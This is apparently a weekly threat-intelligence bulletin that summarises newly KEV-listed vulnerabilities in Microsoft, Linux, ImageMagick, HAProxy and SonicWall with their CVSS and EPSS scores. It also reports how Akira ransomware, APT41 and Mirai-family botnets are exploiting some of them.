This week has been very critical, with CISA adding seven new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Among these are four Microsoft-related issues: CVE-2024-38226, CVE-2024-43491, CVE-2024-38014, and CVE-2024-38217. These vulnerabilities, addressed in Microsoft’s latest Patch Tuesday update, pose significant risks if not swiftly patched, underscoring the urgent need for system updates to thwart potential attacks.
In addition, CISA has included two older yet still critical vulnerabilities: CVE-2017-1000253, a serious Linux Kernel flaw, and CVE-2016-3714, an issue with ImageMagick software. The addition of these historic vulnerabilities highlights their ongoing threat, particularly to critical infrastructure that may remain unpatched. This week’s updates emphasize the need for vigilant security practices and comprehensive updates for both current and legacy vulnerabilities across all systems.
The notorious Akira ransomware has been actively exploiting CVE-2024-40766, a critical vulnerability in SonicWall Firewalls, to gain initial access to victims' systems. Similarly, the APT-41 threat actor has been deploying the SideWalk trojan malware, which targets a critical vulnerability in OSGeo GeoServer GeoTools.
The Mirai botnet continues its aggressive exploitation, targeting LB-Link BL devices, TP-Link Archer AX21 routers, and Avtech Security cameras. Notably, variants of Mirai such as Condi and JenX are leveraging a critical vulnerability in OSGeo GeoServer GeoTools. Additionally, the Sysrv and Enemy botnets are exploiting vulnerabilities in Spring Cloud Gateway and Huawei HG532 devices. The IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
A recently disclosed Windows Installer vulnerability, identified as CVE-2024-38014, poses a severe threat by allowing attackers to elevate their privileges to SYSTEM level without requiring user input. With a CVSS score of 7.8 and an EPSS score of 0.00146, this high-severity vulnerability has been added to the CISA KEV catalog.
A security feature bypass vulnerability in the Windows Mark-of-the-Web (MotW), tracked as CVE-2024-38217, has an EPSS score of 0.00382. This exploit could compromise the Mark of the Web functionality, enabling unauthorized actions on the user's system. Microsoft describes the impact as a "limited compromise," affecting the integrity and availability of application reputation checks and other security features. This vulnerability has been added to the CISA KEV catalog.
Recently added to CISA KEV catalog, a security feature bypass vulnerability in Microsoft Publisher, rated with a low EPSS score of 0.00144, enables attackers to evade Office macro policies. This vulnerability poses a significant risk by allowing the execution of untrusted or malicious files, which could compromise system security.
Yet another remote code execution vulnerability in Microsoft Windows, identified as CVE-2024-43491, has an EPSS score of 0.00712 and a high CVSS score of 9.8. This critical flaw allows attackers to exploit previously mitigated vulnerabilities in Windows 10, version 1507. The issue involves a rollback of fixes that Microsoft had implemented between March and August for certain versions of Windows 10. This vulnerability has been added to the CISA KEV catalog, highlighting its significant threat to system security.
A vulnerability in HAProxy, with an EPSS score of 0.00858 and a CVSS score of 7.8, can create an endless loop under certain conditions, potentially causing a system crash and enabling remote denial-of-service (DoS) attacks. This issue arises from a flaw in the HTTP/2 multiplexer, particularly when used with zero-copy forwarding designed to optimize data transfer. In rare cases, attackers can exploit this vulnerability to initiate an infinite loop in the h2_send() function.
An improper access control vulnerability in SonicWall SonicOS, impacting both management access and SSLVPN, can grant unauthorized access to system resources and, in some cases, cause a firewall crash. With a CVSS score of 9.3 and an EPSS score of 0.01179, this vulnerability poses a serious security risk and has been added to the CISA KEV catalog.
A high-severity stack-based buffer overflow vulnerability in the Linux Kernel, rated CVSS 7.8 and EPSS 0.06297, allows local attackers to escalate privileges. Recently included in the CISA KEV catalog and with a publicly available proof of concept (PoC), this vulnerability has been historically exploited by DarkRadiation ransomware and the Libprocesshider rootkit, representing a serious security risk.
Discovered eight years ago, an improper input validation flaw in ImageMagick allows attackers to run arbitrary code by embedding malicious shell metacharacters in images. The vulnerability, rated with a CVSS score of 8.4 and a high EPSS score of 0.97355, poses a significant security threat and has recently been added to the CISA KEV catalog.
Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.
Identified vulnerabilities exploited by botnets,including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloadssuggestive of botnet activities, like utilizing wget with IP addresses.
We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.
Recent investigations from Artic Wolf revealed that a critical improper access control vulnerability in SonicWall Firewall is being exploited by Akira ransomware to gain initial access to the target systems. Akira ransomware, first identified in early 2023, operates under a Ransomware-as-a-Service (RaaS) model and is linked to threat actors such as GOLD SAHARA, PUNK SPIDER, and Storm-1567. It employs a double extortion tactic, exfiltrating data before encrypting victim systems, and demands Bitcoin payments for decryption or to prevent data leaks.
An eval injection vulnerability in GeoServer can lead to remote code execution and has been exploited by GOREVERSE malware. In certain cases, attackers have used this flaw to deploy SideWalk malware, a sophisticated backdoor linked to the APT41 threat group. Additionally, the vulnerability has been leveraged to distribute Mirai variants like JenX and the Condi DDoS bot.
It refers tovulnerabilities discovered and potentially exploited before their official inclusionin the National Vulnerability Database. The LOVI Platform aggregates anddistributes data from open sources and social media, currently tracking over100 security alerts and planning to expand.